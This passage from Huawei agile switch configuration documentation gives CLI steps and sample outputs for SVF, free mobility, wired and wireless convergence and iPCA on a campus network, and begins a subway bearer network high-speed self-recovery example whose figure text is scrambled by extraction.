VLAN that mobile terminals in Service VLAN accessed by STAs in teaching area 1,
teaching area 1 belong to. such as the VLAN that STA_1 belongs to.
ID: 202
IP address: 192.168.202.1/24
VLAN that mobile terminals in Service VLAN accessed by STAs in the library, such as
the library belong to. the VLAN that STA_2 belongs to.
ID: 204
IP address: 192.168.204.1/24
2.4.6 Configuration Procedure

This section only describes how to configure agile features, and does not describe other basic
configurations, such as routing connectivity.
SVF Configuration Procedure

Configure ASs to connect to the parent.
1. Configure the two switches in the parent to set up a CSS. For details, see the product
documents.
2. Log in to the CSS and enable the SVF function.
[HUAWEI] vlan batch 11
[HUAWEI] dhcp enable //Enable the DHCP server function to allow an AS to
obtain an IP address from the parent.
[HUAWEI] interface vlanif 11
[HUAWEI-Vlanif11] ip address 192.168.11.1 24
[HUAWEI-Vlanif11] dhcp select interface
[HUAWEI-Vlanif11] dhcp server option 43 ip-address 192.168.11.1 //Configure
the parent to send the IP address to an AS so that the AS can set up a CAPWAP
link with the specified IP address.
[HUAWEI-Vlanif11] quit
[HUAWEI] capwap source interface vlanif 11 //Set up a CAPWAP link between
the parent and the AS.
[HUAWEI] authentication unified-mode //Change the network admission control
(NAC) configuration mode to the united mode.
[HUAWEI] stp mode rstp //Set the working mode to STP or RSTP when enabling
the SVF function.
[HUAWEI] uni-mng //Enable the SVF function and enter the uni-mng view.
Warning: This operation will enable the uni-mng mode and disconnect all ASs.

STP calculation may be triggered and service traffic will be affected.

Continue?[Y/N]: y
NOTE
When enabling the SVF function, ensure that the current and next startup NAC configuration modes are
the unified mode.
You can run the display authentication mode command to check whether the current and next startup
NAC configuration modes are the unified mode. If not, set the modes to the unified mode.
After the traditional and unified modes are switched, restart the device to make the configuration take
effect. By default, the NAC configuration mode is unified mode.
3. Configure access parameters for ASs.
# Configure ASs' names, and specify the device models and management MAC
addresses for the ASs.
[HUAWEI-um] as name as1 model S5700-52X-PWR-LI-AC mac-address 0200-0000-0011
[HUAWEI-um-as-as1] quit
# Configure the fabric ports that connect the parent to level-1 ASs (AS_1 and AS_2).
The following example configures the fabric port that connects the parent to AS_1. The
configuration of the fabric port that connects the parent to AS_2 is similar and is not
mentioned here.
[HUAWEI-um] interface fabric-port 1
[HUAWEI-um-fabric-port-1] port member-group interface eth-trunk 1
[HUAWEI-um-fabric-port-1] quit
[HUAWEI-um] quit
[HUAWEI] interface gigabitethernet 1/1/0/1
[HUAWEI-GigabitEthernet1/1/0/1] eth-trunk 1
[HUAWEI-GigabitEthernet1/1/0/1] quit
[HUAWEI-GigabitEthernet2/1/0/1] eth-trunk 1
# Configure the fabric port that connects level-1 AS (AS_1) to level-2 AS (AS_3).
[HUAWEI] uni-mng
[HUAWEI-um] as name as1
[HUAWEI-um-as-as1] down-direction fabric-port 4 member-group interface eth-
trunk 4
[HUAWEI-um-as-as1] port eth-trunk 4 trunkmember interface gigabitethernet
0/0/23 to 0/0/24
[HUAWEI-um] quit
# Configure AS to be authenticated using a whitelist when they connect to an SVF
system.
[HUAWEI] as-auth
[HUAWEI-as-auth] undo auth-mode
[HUAWEI-as-auth] whitelist mac-address 0200-0000-0011
[HUAWEI-as-auth] quit
[HUAWEI] quit
4. Clear the configurations of ASs, restart the ASs, and then connect the ASs to the parent
using cables. Subsequently, an SVF system is set up.
NOTE
Before connecting an AS to the parent, ensure that the AS has no configuration file or input on the
console port.
# Clear the configurations of ASs and restart the ASs. (This process takes 5 minutes.
During the process, ensure that the AS has no input on the console port. If the ASs are

unconfigured, you can directly connect the ASs to the parent with no need to restart the
ASs.)
<HUAWEI> reset saved-configuration
Warning: The action will delete the saved configuration in the device.
The configuration will be erased to reconfigure. Continue? [Y/N]:y
# After connecting the cables, run the display as all command to check whether all ASs
have connected to the SVF system successfully.
<HUAWEI> display as all
------------------------------------------------------------------------------
No. Type Mac IP State Name
------------------------------------------------------------------------------
0 S5700-52X-PWR-LI-AC 0200-0000-0011 192.168.11.254 normal as1
------------------------------------------------------------------------------
Total: 3
Configure an AP to connect to an AS. The following example describes how to connect AP_1
to AS_3, and the procedure for connecting AP_2 to AS_2 is not mentioned here.
1. Create a network basic profile, and specify a pass-VLAN for mobile terminals connected
to AP_1.
[HUAWEI] uni-mng
[HUAWEI-um] network-basic-profile name profile_ap
[HUAWEI-um-net-basic-profile_ap] pass-vlan 202
[HUAWEI-um-net-basic-profile_ap] quit
2. Add the the port connecting AS_3 to AP_1 to an AP port group.

[HUAWEI-um] port-group connect-ap name group_ap
[HUAWEI-um-portgroup-group_ap] network-basic-profile profile_ap
[HUAWEI-um-portgroup-group_ap] as name as3 interface gigabitethernet 0/0/24
[HUAWEI-um-portgroup-group_ap] quit
[HUAWEI-um] commit as all
Warning: Committing the configuration will take a long time. Continue?[Y/N]:y
[HUAWEI-um] quit
3. Configure access parameters for AP_1.

# Configure the AP ID.
If the switch is running V200R007C00 or V200R008C00, run:
[HUAWEI] wlan
[HUAWEI-wlan-view] ap id 1 ap-type ap5010dn-agn mac ac85-3da6-a420
[HUAWEI-wlan-ap-1] quit
If the switch is running V200R009C00 and later versions, run:

[HUAWEI] wlan
[HUAWEI-wlan-view] ap-id 1 ap-type ap5010dn-agn ap-mac ac85-3da6-a420
# Configure non-authentication for AP_1 to connect to an SVF system.

If the switch is running V200R007C00 or V200R008C00, run:
[HUAWEI-wlan-view] ap-auth-mode no-auth
[HUAWEI-wlan-view] quit
If the switch is running V200R009C00 and later versions, run:

[HUAWEI-wlan-view] ap auth-mode no-auth
4. Power on AP_1 and connect AP_1 to AS_3 using cables.

# After connecting the cables, run the display ap all command to check whether AP_1
has connected to the SVF system successfully.
In V200R007C00 or V200R008C00, the following information is displayed:

[HUAWEI] display ap all

All AP(s) information:
Normal[1],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
1 AP5010DN-AGN ac85-3da6-a420 0/0 normal ap-1
------------------------------------------------------------------------------
Total number: 1,printed: 1
In V200R009C00 and later versions, the following information is displayed:

[HUAWEI] display ap all
Total AP information:
nor : normal [1]
------------------------------------------------------------------------------
-------------------
ID MAC Name Group IP
Type State STA Uptime
------------------------------------------------------------------------------
-------------------
1 ac85-3da6-a420 ac85-3da6-a420 default 192.168.11.254 AP5010DN-
AGN nor 0 6H:3M:40S
------------------------------------------------------------------------------
-------------------
Total: 1
Configure a PC to connect to an AS. The following example describes how to connect PC_1
to AS_3, and the procedure for connecting PC_2 to AS_2 is not mentioned here.
1. Create a network basic profile and a user access profile.
[HUAWEI] uni-mng
[HUAWEI-um] network-basic-profile name profile_1
[HUAWEI-um-net-basic-profile_1] user-vlan 100
[HUAWEI-um-net-basic-profile_1] quit
[HUAWEI-um] quit
2. Create a network basic profile and a user access profile.

The configuration in V200R007C00 or V200R008C00 is as follows:
[HUAWEI] uni-mng
[HUAWEI-um] user-access-profile name pro1
[HUAWEI-um-user-access-pro1] authentication dot1x
[HUAWEI-um-user-access-pro1] quit
The configuration in V200R009C00 and later versions is as follows:

[HUAWEI] dot1x-access-profile name 1
[HUAWEI-dot1x-access-profile-1] quit
[HUAWEI] authentication-profile name dot1x_auth
[HUAWEI-authen-profile-dot1x_auth] dot1x-access-profile 1
[HUAWEI-authen-profile-dot1x_auth] quit
[HUAWEI] uni-mng
[HUAWEI-um] user-access-profile name pro1
[HUAWEI-um-user-access-pro1] authentication-profile dot1x_auth
3. Create a group, and bind the network basic profile and user access profile to the group.
[HUAWEI-um] port-group name group1
[HUAWEI-um-portgroup-group1] network-basic-profile profile_1
[HUAWEI-um-portgroup-group1] user-access-profile pro1
[HUAWEI-um-portgroup-group1] as name as3 interface GigabitEthernet 0/0/23
[HUAWEI-um] commit as name as3
[HUAWEI-um] quit
4. Configure PC_1 to connect to AS_3.

[HUAWEI] aaa
[HUAWEI-aaa] authentication-scheme sch1
[HUAWEI-aaa-authen-shc1] authentication-mode none
[HUAWEI-aaa-authen-shc1] quit

[HUAWEI-aaa] domain pc
[HUAWEI-aaa-domain-pc] authentication-scheme sch1
[HUAWEI-aaa-domain-pc] quit
[HUAWEI-aaa] quit
5. Check whether the user has connected to the SVF system.
If the user is dynamically configured to connect to an SVF system, perform shutdown
and undo shutdown operations to reconnect the wired user to the SVF system. Run the
display access-user command to check whether the user has connected to the SVF
system.
[HUAWEI] uni-mng
[HUAWEI-um] as name as3
[HUAWEI-um-as-as3] shutdown interface gigabitethernet 0/0/23
[HUAWEI-um-as-as3] undo shutdown interface gigabitethernet 0/0/23
[HUAWEI-um] quit
Free Mobility Configuration Procedure

1. Create and configure a RADIUS server template, an AAA authentication scheme, and an
authentication domain.
# Create and configure a RADIUS server template rd1.
[HUAWEI] radius-server template rd1
[HUAWEI-radius-rd1] radius-server authentication 192.168.2.31 1812
[HUAWEI-radius-rd1] radius-server shared-key cipher Huawei@123
[HUAWEI-radius-rd1] quit
# Create an AAA authentication scheme abc, and set the authentication mode to
RADIUS.
[HUAWEI] aaa
[HUAWEI-aaa] authentication-scheme abc
[HUAWEI-aaa-authen-abc] authentication-mode radius
[HUAWEI-aaa-authen-abc] quit
# Create an authentication domain isp1, and bind the AAA authentication scheme abc
and RADIUS server template rd1 to the domain.
[HUAWEI-aaa] domain isp1
[HUAWEI-aaa-domain-isp1] authentication-scheme abc
[HUAWEI-aaa-domain-isp1] radius-server rd1
[HUAWEI-aaa-domain-isp1] quit
[HUAWEI-aaa] quit
# Configure a global default domain isp1. If a user name does not contain a domain
name or contains an invalid domain name, the user is authenticated in the default
domain.
[HUAWEI] domain isp1
2. Configure 802.1x authentication and web authentication.
# Create and configure a Portal server template abc.
[HUAWEI] web-auth-server abc
[HUAWEI-web-auth-server-abc] server-ip 192.168.2.31
[HUAWEI-web-auth-server-abc] url http://192.168.2.31:50200/webagent
[HUAWEI-web-auth-server-abc] shared-key cipher Huawei@123
[HUAWEI-web-auth-server-abc] quit
# Enable 802.1x authentication and web authentication on GE1/1/0/1.
[HUAWEI-GigabitEthernet1/1/0/1] authentication dot1x portal
[HUAWEI-GigabitEthernet1/1/0/1] web-auth-server abc direct //Bind the
Portal server template to GE1/1/0/1.
# Enable the free mobility function, and configure an IP address for the Agile Controller
server and a password used for communicating with the Agile Controller.

[HUAWEI] group-policy controller 192.168.2.31 password Huawei@123
3. Perform the following configurations on the Agile Controller.

Screenshots need to be provided for describing the configurations on the Agile
Controller. For details, see the Agile Controller product documents. The following
describes the configuration roadmap.
a. Create user accounts in source security groups. For example, you can configure user
names, passwords, and departments for common guests, undergraduates,
postgraduates, and teachers.
b. Configure RADIUS, Portal, and XMPP parameters, and add the core switch to
ensure that the S series switches can communicate with the Agile Controller.
c. Configure source security groups and destination security groups to indicate users
and resources respectively. For example, the IP address of the public resource
server is 10.10.1.1/32.
d. Use fast authorization to authorize a source security group to the corresponding
department. Users are mapped to the source security group after being
authenticated.
e. Configure access control policies and specify whether users in a source security
group are permitted to access a destination security group. Deploy the access
control policies on all devices on the network. For example, common guests can
only access the public resources, and cannot access the education management
system and internal FTP resources.
Table 2-11 Security groups and access control policies configured on the Agile Controller
Source Destination Security Group (Resource) Access
Security Control
Group (User) Policy
Common guest Public resources (bound IP address: 10.10.1.1/32) Permit
Education management system (bound IP address Forbid

10.10.2.1/32)
FTP resources (bound IP address: 10.10.3.1/32) Forbid
Undergraduate Public resources (bound IP address: 10.10.1.1/32) Permit

or postgraduate
Education management system (bound IP address Forbid
10.10.2.1/32)
FTP resources (bound IP address: 10.10.3.1/32) Permit
Teacher Public resources (bound IP address: 10.10.1.1/32) Permit
Education management system (bound IP address Permit

10.10.2.1/32)
FTP resources (bound IP address: 10.10.3.1/32) Permit

Wired and Wireless Convergence Configuration Procedure

After wired and wireless convergence is configured on an agile switch, you can directly
configure the agile switch but does not need to configure the switch and independent AC or
ACU2 respectively.
1. Configure the S12708 to function as a DHCP server to assign IP addresses to PCs and
STAs. The S12708 assigns IP addresses to APs through SVF. You do not need to
configure the S12708 to assign IP addresses to APs. The following example describes
how the S12708 assigns IP addresses to the PCs and STAs in teaching area 1.
# Configure the S12708 to assign an IP address to PC_1 from the global address pool.
[HUAWEI] dhcp enable
[HUAWEI] vlan batch 100 202
[HUAWEI-Vlanif100] dhcp select global
[HUAWEI] ip pool 100
[HUAWEI-ip-pool-100] gateway-list 192.168.100.1
[HUAWEI-ip-pool-100] network 192.168.100.0 mask 24
[HUAWEI-ip-pool-100] quit
# Configure the S12708 to assign IP addresses to STAs from the global address pool.
The IP addresses in the address pool 202 are assigned to the STAs connected to AP_1,
and the IP addresses in the address pool 204 are assigned to the STAs connected to
AP_2.
The following example describes how the S12708 assigns IP addresses to the STAs
connected to AP_1.
[HUAWEI-Vlanif202] dhcp select global
[HUAWEI] ip pool 202
[HUAWEI-ip-pool-202] gateway-list 192.168.202.1
[HUAWEI-ip-pool-202] network 192.168.202.0 mask 24
[HUAWEI-ip-pool-202] quit
2. Configure the AC's system parameters.
# Configure the AC's country code.
[HUAWEI] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which
use
the global country code and reset them, continue?[Y/N]:y
# Configure the AC ID and carrier ID.
[HUAWEI] wlan ac-global ac id 1 carrier id other //The AC ID is 0 by
default. In this example, the AC ID is changed to 1.
# Configure the AC's source interface.
[HUAWEI] wlan
[HUAWEI-wlan-view] wlan ac source interface vlanif 11
3. Configure the AC to manage APs.
# Check the AP type ID after obtaining the AP's MAC address.
[HUAWEI-wlan-view] display ap-type all
All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
1 AP5010DN-AGN
------------------------------------------------------------------------------
Total number: 1

# Set the AP authentication mode to MAC address authentication (default setting). Add
the APs offline according to the obtained AP type ID. The configuration of AP access
parameters is described in the SVF configuration procedure, and will not be described
here.
# Configure an AP region and add the APs to the region.
[HUAWEI-wlan-view] ap-region id 10
[HUAWEI-wlan-ap-region-10] quit
[HUAWEI-wlan-view] ap id 1
[HUAWEI-wlan-ap-1] region-id 10
[HUAWEI-wlan-view] ap id 2
[HUAWEI-wlan-ap-2] region-id 10
# After powering on the AP, run the display ap all command on the AC to check the AP
state. The command output shows that the AP state is normal.
[HUAWEI-wlan-view] display ap all
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
0 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-0
------------------------------------------------------------------------------
4. Configure the WLAN service parameters.

# Create a WMM profile wmm.
[HUAWEI-wlan-view] wmm-profile name wmm id 1
[HUAWEI-wlan-wmm-prof-wmm] quit
# Create a radio profile radio, and bind the WMM profile wmm to the radio profile.
[HUAWEI-wlan-view] radio-profile name radio id 1
[HUAWEI-wlan-radio-prof-radio] wmm-profile name wmm
[HUAWEI-wlan-radio-prof-radio] quit
# Create a WLAN-ESS interface.

[HUAWEI] interface wlan-ess 1
[HUAWEI-Wlan-Ess1] port trunk allow-pass vlan 202
[HUAWEI-Wlan-Ess1] quit
# Create a security profile security.

[HUAWEI] wlan
[HUAWEI-wlan-view] security-profile name security id 1
[HUAWEI-wlan-sec-prof-security] security-policy wpa2 //Set the security
policy to WPA2.
[HUAWEI-wlan-sec-prof-security] wpa2 authentication-method psk pass-phrase
cipher huawei123 encryption-method ccmp //Set the encryption method to PSK
+CCMP.
[HUAWEI-wlan-sec-prof-security] quit
# Create a traffic profile traffic and set the STA's uplink rate limit to 2000 kbit/s and
downlink rate limit to 2400 kbit/s.
[HUAWEI-wlan-view] traffic-profile name traffic id 1
[HUAWEI-wlan-traffic-prof-traffic] rate-limit client up 2000
[HUAWEI-wlan-traffic-prof-traffic] rate-limit client down 2400
[HUAWEI-wlan-traffic-prof-traffic] quit
# Create a service set area1, and bind the WLAN-ESS interface, security profile, and
traffic profile to the service set. Set the forwarding mode to direct forwarding (default
setting).

[HUAWEI-wlan-view] service-set name area1 id 1

[HUAWEI-wlan-service-set-area1] ssid area1
[HUAWEI-wlan-service-set-area1] wlan-ess 1
[HUAWEI-wlan-service-set-area1] security-profile name security
[HUAWEI-wlan-service-set-area1] traffic-profile name traffic
[HUAWEI-wlan-service-set-area1] service-vlan 202
[HUAWEI-wlan-service-set-area1] quit
5. Configure a virtual AP (VAP) and deliver it to an AP.

# Configure a VAP.
[HUAWEI-wlan-view] ap 1 radio 0
[HUAWEI-wlan-radio-1/0] radio-profile name radio
[HUAWEI-wlan-radio-1/0] service-set name area1
[HUAWEI-wlan-radio-1/0] quit
# Commit the configuration.

[HUAWEI-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?
[Y/N]:y
iPCA Configuration Procedure

NOTE
iPCA can be performed to detect packet loss on agile switches and between agile switches. If you want to
detect packet loss between the main campus and branch campus networks, agile switches need to be deployed
on both networks.
Configure the packet loss measurement function for a device.

1. Enable iPCA on each device to implement packet loss measurement so that you can
know packet loss in a timely manner. Configure the packet loss alarm on each device.
[HUAWEI] iplpm global loss-measure alarm enable //Enable the packet loss
alarm and clear alarm on a device.
[HUAWEI] iplpm global loss-measure enable //Enable the packet loss
measurement
2. Run the display iplpm loss-measure statistics global command to check the packet loss
measurement results on a device. You can check the values of Loss Packets and
LossRatio to know whether packet loss occurs on a device.
[HUAWEI] display iplpm loss-measure statistics global
Latest global loss statistics:
------------------------------------------------------------------------------
--
StartTime(DST) Loss Packets LossRatio
ErrorInfo
------------------------------------------------------------------------------
--
2015-06-12 18:47:30 344127 4.513519% OK
2015-06-12 18:47:20 381085 4.513196% OK
2015-06-12 18:47:10 381192 4.513290% OK
2015-06-12 18:47:00 381339 4.513341% OK
2015-06-12 18:46:50 381465 4.513392% OK
2015-06-12 18:46:40 381444 4.513487% OK
2015-06-12 18:46:30 381129 4.513309% OK
------------------------------------------------------------------------------
--
Configure the end-to-end packet loss measurement function.

1. Configure the core switches in the main campus.
[HUAWEI] nqa ipfpm dcp //Enable the DCP function globally.
[HUAWEI-nqa-ipfpm-dcp] dcp id 1.1.1.1 //Configure the DCP ID.
[HUAWEI-nqa-ipfpm-dcp] instance 1
[HUAWEI-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[HUAWEI-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24

destination 10.2.1.0 24 //Set the target flow to a bidirectional

symmetrical flow.
[HUAWEI-nqa-ipfpm-dcp-instance-1] tlp 1 in-point ingress //Color the target
flows that enter the network.
[HUAWEI-nqa-ipfpm-dcp-instance-1] quit
[HUAWEI-nqa-ipfpm-dcp] quit
[HUAWEI] interface gigabitethernet 3/1/0/1 //Specify the interface
connecting to the core switch in the branch campus.
[HUAWEI-GigabitEthernet3/1/0/1] ipfpm tlp 1 //Bind a Target Logical Port
(TLP) to the interface.
[HUAWEI] interface gigabitethernet 3/1/0/2 //Specify the interface
connecting to the core switch in the branch campus.
[HUAWEI-GigabitEthernet3/1/0/2] ipfpm tlp 1 //Bind a TLP to the interface.
[HUAWEI] nqa ipfpm dcp
[HUAWEI-nqa-ipfpm-dcp] instance 1
[HUAWEI-nqa-ipfpm-dcp-instance-1] loss-measure enable continual //Enable
the continual packet loss measurement function for the DCP instance.
[HUAWEI-nqa-ipfpm-dcp-instance-1] quit
[HUAWEI-nqa-ipfpm-dcp] quit
2. Configure the core switches in the branch campus.
[HUAWEI] sysname Switch
[Switch] nqa ipfpm dcp
[Switch-nqa-ipfpm-dcp] dcp id 2.2.2.2
[Switch-nqa-ipfpm-dcp] instance 1
[Switch-nqa-ipfpm-dcp-instance-1] mcp 2.2.2.2
[Switch-nqa-ipfpm-dcp-instance-1] flow bidirectional source 10.1.1.0 24
destination 10.2.1.0 24
[Switch-nqa-ipfpm-dcp-instance-1] tlp 2 out-point egress
[Switch-nqa-ipfpm-dcp-instance-1] quit
[Switch-nqa-ipfpm-dcp] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] ipfpm tlp 2
[Switch-GigabitEthernet1/0/1] quit
[Switch] nqa ipfpm dcp
[Switch-nqa-ipfpm-dcp] instance 1
[Switch-nqa-ipfpm-dcp-instance-1] loss-measure enable continual
[Switch-nqa-ipfpm-dcp-instance-1] quit
[Switch-nqa-ipfpm-dcp] quit
[Switch] nqa ipfpm mcp //Enable the MCP function globally.
[Switch-nqa-ipfpm-mcp] mcp id 2.2.2.2 //Create a MCP.
[Switch-nqa-ipfpm-mcp] instance 1
[Switch-nqa-ipfpm-mcp-instance-1] dcp 1.1.1.1
[Switch-nqa-ipfpm-mcp-instance-1] dcp 2.2.2.2
[Switch-nqa-ipfpm-mcp-instance-1] loss-measure ratio-threshold upper-limit 7
lower-limit 5 //Set the packet loss alarm threshold to 7% and clear alarm
threshold to 5% for the MCP instance.
[Switch-nqa-ipfpm-mcp-instance-1] quit
[Switch-nqa-ipfpm-mcp] quit
[Switch] quit
3. Verify the configurations.
# Run the display ipfpm statistic-type loss instance 1 command on the core switches in
the branch campus to view the packet loss measurement results.
<Switch> display ipfpm statistic-type loss instance 1
Latest loss statistics of forward flow:

Unit: p - packet, b - byte
------------------------------------------------------------------------------
------------
Period Loss(p) LossRatio(p) Loss(b)
LossRatio(b)
------------------------------------------------------------------------------
------------
127636768 381549 4.514649% 40444194
4.514649%

127636767 381528 4.514620% 40441968

4.514620%
127636766 381318 4.514996% 40419708
4.514996%
127636765 381192 4.514686% 40406352
4.514686%
127636764 381381 4.514679% 40426386
4.514679%
127636763 381402 4.514748% 40428612
4.514748%
127636762 381081 4.514797% 40394586
4.514797%
127636761 381324 4.514702% 40420344
4.514702%
127636760 381549 4.514870% 40444194
4.514870%
127636759 381066 4.514638% 40392996
4.514638%
127636758 381570 4.514836% 40446420
4.514836%
127636757 382452 4.514757% 40539912
4.514757%
Latest loss statistics of backward flow:

------------------------------------------------------------------------------
------------
LossRatio(b)
------------------------------------------------------------------------------
------------
127636768 381087 4.513306% 40395222
4.513306%
127636767 381129 4.513384% 40399674
4.513384%
127636766 381465 4.513444% 40435290
4.513444%
127636765 381087 4.513222% 40395222
4.513222%
127636764 381045 4.513272% 40390770
4.513272%
127636763 381381 4.513364% 40426386
4.513364%
127636762 381276 4.513435% 40415256
4.513435%
127636761 380961 4.513280% 40381866
4.513280%
127636760 381339 4.513574% 40421934
4.513574%
127636759 381045 4.513270% 40390770
4.513270%
127636758 381088 4.513226% 40395328
4.513226%
127636757 382409 4.513464% 40535354
4.513464%
2.4.7 Summary and Recommendations

In this document, the application of S series agile switches on the agile network in the
education industry is taken as an example to describe the application and key configurations
of agile features of agile switches.
l Wired and wireless convergence

Agile switches have native AC cards installed to converge wired and wireless networks
into one network, simplifying the configuration and maintenance of wired and wireless
networks. The high switching capability and scalability of agile switches eliminate

bottlenecks in centralized traffic forwarding when independent ACs or AC cards are

used.
l Free mobility
Free mobility enables the unified management of users' identity information on the entire
network. It ensures that a user can have the same network access rights and enjoy the
same service experience when using different IP addresses to access the network from
different locations.
l SVF
The SVF technology virtualizes core, aggregation, and access switches on a network into
one super switch. The core switch uniformly delivers configurations to and manages
aggregation and access switches.
l iPCA
iPCA collects statistics of packets that each device sends and forwards on one or
multiple paths. If a packet is lost, eSight can immediately detect the packet loss
information and locate where the packet is lost. iPCA realize the real-time monitoring of
real service traffic.
The agile features of S series switches are being developed and optimized. In the future, S
series switches will be more widely used on agile networks.
2.5 Example for Configuring High-Speed Self Recovery on

a Subway Bearer Network
2.5.1 Service Requirements and Solution Description

This section describes service requirements of the rail transmit bearer network and the
Hierarchy of VPN (HoVPN)-based High-speed Self Recovery (HSR) solution.
Service Requirements
Economic and social development makes traveling by subway become a major way to avoid
traffic congestion in cities. A more diverse range of IP services and increasing data traffic
require a highly secure and reliable subway public transportation system. The legacy subway
bearer network can no longer meet these requirements, and a more robust, reliable bearer
network is required by a digital subway system. A modernized subway bearer network needs
to meet the following requirements:
l Ensures high reliability and security: Subways belong to the public transportation
system, requiring the subway bearer network to be reliable and secure.
l Provides sufficient data capacity: The subway system has high passenger traffic and
increasing data terminals, requiring the subway bearer network to provide sufficient data
capacity and data switching capacity.
l Supports a diverse range of service types: The subway system involves different service
types such as the control system, advertising media, and daily office, requiring the
subway bearer network to support a diverse range of service types.
The IP data communication network is the mainstream data communication network, supports
various access modes, and has a large network scale. Constructing an IP-based subway bearer
network has become a trend in future development.

Huawei offers the HoVPN-based HSR solution to implement secure and reliable subway
system operation and support a diverse range of service types for the subway system. The
HSR solution uses Huawei agile switches to construct a hierarchical network based on MPLS
L3VPN technology, provides powerful service supporting capabilities and simple as well as
flexible networking modes, and is suitable for large-scale subway bearer networks. This
solution adopts multiple protection technologies, including hardware bidirectional forwarding
detection (BFD), TE hot standby (HSB), VPN fast reroute (FRR), and traffic forwarding on
the Virtual Route Redundancy Protocol (VRRP) backup device and provides protection
switchovers within milliseconds to complete an end-to-end link switchover without being
noticed by users.
Overview
The Hierarchy of VPN (HoVPN)-based High-Speed Self Recovery (HSR) solution is
designed to ensure network reliability, scalability, maintainability, and multi-service
supporting capability, provide a hierarchical network structure, and reduce networking costs.
Figure 2-14 shows the network topology in the HSR solution.
Figure 2-14 Network topology
Site1_UPE1 Site3_UPE6
CE1 CE3
vpna vpna
BFD for Core_SPE1 BFD for
VRRP VRRP
TE HSB TE HSB
VPN FRR VPN FRR
Site1_UPE2 VPN FRR Site3_UPE5
Data center site Metro site 2

Core_SPE2 Core_SPE3
TE HSB
VPN FRR
BFD for
VRRP
CE2
vpna
Metro site 1
In Figure 2-14,
l Three S9700 switches are fully connected on the core layer to form a core ring, while the
data center site and two subway sites exchange data across the core ring.

l Two S5720HIs are deployed as aggregation switches in each subway site and form
square networking with two S9700s on the core ring. Alternatively, S5720HIs in multiple
sites are connected in serial networking and then form square networking with two
S9700s on the core ring. S5720HIs have VRRP configured to function as user gateways
of each subway site. The data center site uses two S9700s as aggregation switches and
has same services as S5720HIs deployed.
l Layer 2 switches are deployed on the access layer in each site to form an access ring and
are dual-homed to two S5720HIs in subway sites or two S9700s in the data center site.
This network transmits all service traffic of the subway system, including traffic of routine
office, advertising media, and train control management.
Service Deployment
Table 2-12 Service deployment

Item Solution
IGP Use OSPF as an IGP and run OSPF between aggregation and core switches to
ensure that these switches can be reached through routes and set up
Multiprotocol Label Switching (MPLS) Label Distribution Protocol (LDP) and
MPLS Traffic Engineering (TE) over OSPF routes.
BGP Deploy Multiprotocol Border Gateway Protocol (MP-BGP) to set up L3VPN

tunnels over MP-BGP routes. Establish Internal BGP (IBGP) neighbor
relationships between aggregation and core switches, and between core switches,
and advertise VPN routes.
Routin Use routing policies to set the preferred value, and community attribute to filter,
g select, and back up routes.
policy
MPLS Run LDP between aggregation and core switches to transmit L3VPN data on
LDP links for label switching. Configure BFD for label switched paths (LSPs) to
implement fast link switchovers.
MPLS Deploy MPLS TE tunnels to transmit L3VPN traffic. That is, establish the
TE primary and backup TE tunnels between each S5720HI and its directly connected
S9700, and establish the primary and backup tunnels between each S9700 and its
directly connected S5720HI. Enable TE HSB and configure BFD for TE HSB to
allow traffic to be switched from the faulty primary TE tunnel to the backup TE
tunnel within 50 ms.
L3VPN Configure different VPNs for services such as daily office, advertising media,
and train control management to isolate these services. In this scenario, one VPN
is configured as an example.
BFD Use BFD on each node to detect faults and implement fast traffic switchovers in
case of faults. In this example, you need to deploy multiple services, including
BFD for VRRP, BFD for LSP, and BFD for TE, to complete end-to-end
switchovers within 50 ms.

Item Solution
TE Establish bidirectional TE tunnels between S5720HI aggregation switches and

HSB S9700 core switches, and deploy HSB for MPLS TE tunnels to provide the
primary and backup constraint-based routed label switched paths (CR-LSPs) for
each TE tunnel. Configure BFD for CR-LSP to fast detect CR-LSP faults. When
a fault occurs on the primary CR-LSP, L3VPN traffic can be fast switched to the
backup CR-LSP, providing end-to-end traffic protection.
Hybrid Enable IP+VPN hybrid FRR on S5720HIs. When a fault occurs on the downlink
fast access link, the connected interface on one S5720HI will detect the fault and fast
reroute switch traffic to the peer S5720HI, which then forwards traffic to access devices.
(FRR)
VRRP Deploy VRRP between two S5720HIs to implement gateway backup for access
users. Configure BFD for VRRP to speed up fault detection, VRRP convergence,
and traffic switchovers. To prevent traffic loss caused by aggregation switch
faults and shorten service interruptions, you also need to configure the VRRP
backup device to forward service traffic.
Device Selection and Restrictions
Table 2-13 Device selection and restrictions
Network Device Selection and Restrictions

Element
Core nodes and Use S9706s or S9712s as core nodes and data center aggregation nodes,
data center and install SRUDs and X1E LPUs on these switches.
aggregation To provide high reliability, ensure that:
nodes
l Eth-Trunk member interfaces reside on the same LPU.
l On the same device, any two interfaces connected to other devices
reside on different LPUs.
Aggregation Use S5720HIs as aggregation switches.

nodes in
subway sites
Version Mapping
Table 2-14 Version mapping
Version Device
V200R009C00 Use S12700s, S9700s, or S7700s as core switches and S5720HIs as


2.5.2 Basic Configuration

This section describes basic configurations of all devices, including device names, interfaces,
IP addresses, and global Bidirectional Forwarding Detection (BFD).
2.5.2.1 Data Plan
Network Topology
Construct a network based on the topology shown in Figure 2-15, name network devices, and
configure IP addresses for network devices, service interfaces, and user interfaces on the
devices.
Figure 2-15 Network topology

CE1 XGE1/0/4.200 XGE0/0/2.100 CE3
Eth
vpna -Tr
0/0/4 vpna
un E
k1 XG
Eth 7
Eth Core_SPE1 1
-Tr - Tr /4 /0/
un
k7 un
k1 6/0 G E0
7 E X
Eth XG 5
Eth -Tr r unk
un -T
-Tr
un k4 Eth /0/
1
XGE1/0/4.200 k7
G E0 XGE0/0/2.100
Eth X
Eth - /4
-Tr Tru k5
un nk un 0/0
k1 4
h-Tr X GE
Site1_UPE2 Et 7 E t Site3_UPE5
h-T 1
run 6 /0/
k1 Eth-Trunk2 E
7 XG
Eth-Trunk2
Core_SPE2 XGE5/0/5 XGE6/0/3 Core_SPE3
